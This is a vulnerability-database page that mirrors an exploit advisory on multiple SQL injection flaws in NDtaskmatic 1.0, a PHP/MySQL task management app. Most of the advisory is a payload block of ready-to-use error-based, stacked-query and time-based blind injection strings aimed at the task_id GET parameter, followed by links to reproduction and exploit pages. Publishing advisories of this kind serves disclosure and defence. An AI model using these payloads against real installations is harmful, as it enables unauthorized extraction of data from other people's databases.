Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:177498
HistoryMar 07, 2024 - 12:00 a.m.

NDtaskmatic 1.0 SQL Injection

2024-03-0700:00:00
nu11secur1ty
packetstormsecurity.com
165
sql injection
ndtaskmatic 1.0
mayuri.k
information security
vulnerability

7.4 High

AI Score

Confidence

Low

JSON
`## Title: NDtaskmatic-1.0-by-Mayuri.K Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 03/07/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
Potential SQLi detected. Please manually confirm it after you check  
manually the POST, GET, or other requests...  
The payload from the puncher_SQLi_bypass_authentication module was  
submitted successfully after the test.  
The task_id is vulnerable to SQLi attacks, the attacker can get all  
information from the system by using this vulnerability!  
  
STATUS: HIGH- Vulnerability  
  
[+]Payload:  
```mysql  
---  
Parameter: task_id (GET)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: task_id=39' AND (SELECT 8670 FROM(SELECT  
COUNT(*),CONCAT(0x7176767871,(SELECT  
(ELT(8670=8670,1))),0x717a717a71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# FrpM  
  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: task_id=39';SELECT SLEEP(7)#  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: task_id=39' AND (SELECT 9072 FROM (SELECT(SLEEP(7)))RtEq)# XSsn  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/NDtaskmatic-1.0-by-Mayuri.K)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/03/ndtaskmatic-10-by-mayurik-multiple-sqli.html)  
  
## Time spend:  
00:35:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`

7.4 High

AI Score

Confidence

Low

JSON